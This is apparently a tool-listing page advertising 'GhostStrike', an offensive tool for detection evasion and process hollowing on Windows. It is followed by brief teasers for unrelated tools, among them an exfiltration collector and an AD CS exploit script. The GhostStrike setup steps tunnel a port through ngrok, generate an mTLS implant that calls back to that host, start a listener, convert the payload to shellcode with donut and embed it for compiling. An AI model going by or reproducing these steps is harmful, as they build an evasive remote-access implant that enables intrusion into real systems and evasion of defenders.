GhostStrike is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.
You can configure GhostStrike with the following steps:
ngrok tcp 443
generate --mtls x.tcp.ngrok.io --save YourFile.exe
mtls --lhost 0.0.0.0 --lport 443
./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin
xxd -i YourFile.bin > YourFile.h
g++
, clang++
, or Visual Studio, is sufficient to compile the code.No additional dependencies are needed to build GhostStrike. Simply compile the source code with your preferred C++ compiler, and you’re ready to go!
garak checks if an LLM can be made to fail in a way we don't…
Vermilion is a simple and lightweight CLI tool designed for rapid collection, and optional exfiltration…
ADCFFS is a PowerShell script that can be used to exploit the AD CS container…
Tartufo will, by default, scan the entire history of a git repository for any text…
Loco is strongly inspired by Rails. If you know Rails and Rust, you'll feel at…
A data hoarder’s dream come true: bundle any web page into a single HTML file.…